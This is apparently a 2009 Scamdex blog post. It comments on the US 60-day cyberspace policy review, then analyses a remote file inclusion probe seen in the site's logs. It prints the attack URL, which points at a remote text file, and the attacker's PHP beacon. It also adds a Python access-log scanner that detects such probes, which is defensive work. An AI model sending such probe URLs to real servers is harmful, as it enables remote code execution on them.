In February 2009, President Obama directed a 60-day review of the plans, programs and activities underway throughout the government that address communications and information infrastructure (i.e., cyberspace). The purpose was to develop a strategic framework to ensure that initiatives in this area are integrated, resourced and coordinated appropriately, both within the Executive Branch and with Congress and the private sector.
Taking a step backwards and acknowledging the interconnectedness of just-about-everything was an important step on the road to formulating some policies. What those policies are will be important for the whole world, not just the US. The fact is that your ability to buy a new book online from Amazon with one click also makes it easy for people to clean out your bank account or foreign aggressors to bring down your local power plant.
The review (read the whole thing here) lists 10 short-term action items:
Phew!
Scamdex is all for making the Internet safer and is prepared to give up a little of the immense freedom we currently hold dear but if this just becomes a handover of ‘control’ to Government-backed special interests then it will be a cynical and sad exercise. A light touch is what is needed, not a hammer!
Melissa Hathaway, Cybersecurity Chief at the National Security Council, had something to add on her blog:
… cyberspace underpins almost every facet of modern society and provides critical support for the U.S. economy, civil infrastructure, public safety and national security.
Protecting cyberspace requires strong vision and leadership and will require changes in policy, technology, education, and perhaps law. The 60-day cyberspace policy review summarizes our conclusions and outlines the beginning of a way forward in building a reliable, resilient, trustworthy digital infrastructure for the future. There are opportunities for everyone—individuals, academia, industry, and governments—to contribute toward this vision. During the review we engaged in more than 40 meetings and received and read more than 100 papers that informed our recommendations. As you will see in our review there is a lot of work for us to do together and an ambitious action plan to accomplish our goals. It must begin with a national dialogue on cybersecurity and we should start with our family, friends, and colleagues.
We are late in addressing this critical national need and our response must be focused, aggressive, and well-resourced. … Ensuring that cyberspace is sufficiently resilient and trustworthy to support U.S. goals of economic growth, civil liberties and privacy protections, national security, and the continued advancement of democratic institutions requires making cybersecurity a national priority.
There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press’. So, can someone clever please tell me why this simple URL hangs up a bunch of seemingly dissimilar web servers:
http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one
Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obvious hack attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away page’.
In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in its entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ‘sKriptKiDee’, aka ‘Wanker’ on the sending end.
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL, does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on its back?
Analyzing the URL gets me to this reduction of required parts:
* any .php file path.
* any query string that contains an ‘http://’ in it
* must have a file extension such as txt, gif, png etc.
* must have the trailing ‘?’
A URL with these parts will cause the same problem on an awful lot of famous-name servers, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc etc.
For example, in the following link, everything except ‘www.amazon.com’ is made up:
http://www.amazon.com/a.php?b=http://c.gif?
but it still exhibits the same behaviour – WTF is going on?
and why, oh why can’t I detect it in my .htaccess file?
First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.
gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.
Good luck!
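The URL shape reduced above (a .php path whose query-string value is itself an ‘http://’ URL ending in ‘?’) can be picked out of web server access logs. The following is an added example, not code from the original post: the log lines, client addresses and function names are constructed for illustration, and it goes slightly beyond the post by also catching percent-encoded variants.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a combined-format access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute URL (anchored at the start).
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jun/2009:10:00:00 +0000] '
    '"GET /errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 512',
    '203.0.113.7 - - [01/Jun/2009:10:00:02 +0000] '
    '"GET /a.php?b=http%3A%2F%2Fc.gif%3F HTTP/1.1" 404 512',
    '198.51.100.4 - - [01/Jun/2009:10:01:00 +0000] '
    '"GET /search.php?q=banana&page=2 HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Jun/2009:10:02:00 +0000] '
    '"GET /out.php?note=see+http://example.org HTTP/1.1" 200 100',
]


def rfi_probe_params(target):
    """Return (name, value) pairs whose decoded value is an absolute URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; undo a second layer
        if REMOTE_URL_RE.match(value):
            hits.append((name, value))
    return hits


def scan_access_log(lines):
    """Return one finding per query parameter that carries a remote URL."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        for name, value in rfi_probe_params(target):
            findings.append({
                "client": line.split(" ", 1)[0],
                "path": urlsplit(target).path,
                "param": name,
                "remote_url": value,
                "trailing_q": value.endswith("?"),  # the trailing '?' from the list above
            })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Parameters that legitimately carry a full URL (redirect or return-to targets, for instance) will also match, so allow-list those parameter names before alerting or blocking on the result.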
_________________________________
Still no replies and it’s still happening…. where have all the gurus gone?